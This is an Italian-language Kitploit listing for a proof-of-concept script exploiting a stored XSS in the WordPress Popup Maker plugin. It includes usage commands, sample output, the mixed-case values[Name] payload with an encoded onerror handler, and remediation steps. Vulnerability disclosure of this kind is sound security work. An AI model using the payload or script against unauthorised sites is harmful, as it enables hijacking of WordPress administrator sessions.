Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-87915-PoC-pwnVader — Shell PoC per CVE-2026-87915, un XSS memorizzato non autenticato nel plugin WordPress Popup Maker (<=1.24.0). Esegue il fingerprinting del plugin e dimostra l'iniezione del payload. | Kitploit
Strumenti/GitHubGitHub/pwnvader/cve-2026-87915-poc-pwnvader
Scanner di VulnerabilitàScanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHub
pwnvader/cve-2026-87915-poc-pwnvader

CVE-2026-87915-PoC-pwnVader

Shell PoC per CVE-2026-87915, un XSS memorizzato non autenticato nel plugin WordPress Popup Maker (<=1.24.0). Esegue il fingerprinting del plugin e dimostra l'iniezione del payload.

Vedi Repository
14 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-87915 — Popup Maker <= 1.24.0 — XSS memorizzato non autenticato (values[Name])

Autore: pwnVader · Licenza: MIT (radice del repository)

ComponentePopup Maker – Boost Sales, Conversions, Optins, Subscribers (plugin WordPress)
TipoCWE-79 — Cross-Site Scripting memorizzato
Affetto<= 1.24.0
Corretto1.25.0
CVECVE-2026-87915 — CVSS 3.1 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
PoCpoc.sh

Riepilogo

Un form pubblico di optin/newsletter di Popup Maker accetta il parametro values[Name] senza sanitizzazione (action=pum_sub_form). Il valore viene memorizzato lato server e successivamente renderizzato nella schermata admin Subscribers. Il filtraggio wp_kses() applicato in output è insufficiente in questo contesto: le entità HTML all'interno dei valori di attributi consentiti sopravvivono alla normalizzazione e vengono valutate dal sink DOM jQuery( link.attr('href') ) in wp-admin/js/common.js quando un amministratore clicca un'ancora della scheda di aiuto contestuale. Effetto netto: XSS memorizzato non autenticato contro un amministratore (è richiesto un clic lato admin).

Utilizzo

root@kitploit:~
# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and detect a public subscribe form
./poc.sh check --target https://example.com

# Store the payload (writes ONE subscriber row; requires authorization)
./poc.sh inject --target https://example.com --authorized

inject utilizza per impostazione predefinita un'email di test univoca e stampa i passaggi di pulizia (interfaccia admin o DELETE FROM wp_pum_subscribers WHERE email = '…';).

Output di esempio (check)

root@kitploit:~
== CVE-2026-87915 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Popup Maker assets are served (plugin installed)
  [info] detected version: 1.22.0
  [PASS] version 1.22.0 is in the affected range (<= 1.24.0)

[2] Public subscribe form detection (read-only)
  [PASS] Popup Maker markup found on the site (a public form may accept values[Name])

Output di esempio (inject, lab)

root@kitploit:~
[3] Stored injection via pum_sub_form (writes one subscriber row)
  response: {"success":true,"data":{"message":"You have been subscribed!"}}
  [PASS] the server accepted and stored the payload unauthenticated

Il bypass, in una riga

root@kitploit:~
values[Name] = <a href="https://github.com/pwnvader/cve-2026-87915-poc-pwnvader/blob/main/%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E">VDP-XSS-PROOF</a>
  • values[name] (minuscolo) è il campo normale; il values[Name] con maiuscole/minuscole miste entra in collisione durante la normalizzazione delle chiavi dell'array PHP e veicola il payload.
  • wp_kses() consente l'elemento <a href>; l'`` codificato come entità all'interno dell'attributo sopravvive al filtraggio e viene decodificato/normalizzato successivamente.
  • wp-admin/js/common.js valuta jQuery( link.attr('href') ), che analizza l'HTML decodificato e attiva il gestore onerror.

Remediation

  • Aggiornare Popup Maker alla versione 1.25.0 o successiva (esc_html() + sanitize_text_field() sul valore memorizzato; vedere il changeset del vendor per classes/Admin/Subscribers/Table.php).
  • Nel frattempo: limitare/disabilitare i form pubblici di iscrizione, oppure filtrare values[Name] a livello di WAF.

Riferimenti

  • NVD — CVE-2026-87915: https://nvd.nist.gov/vuln/detail/CVE-2026-87915
  • Fix del vendor: Popup Maker 1.25.0 (changeset Trac del plugin 3690634)

Disclaimer

Solo per test di sicurezza autorizzati. check è in sola lettura; inject crea esattamente una riga di subscriber di test — eliminarla successivamente con il comando di pulizia stampato.

Scarica lo strumento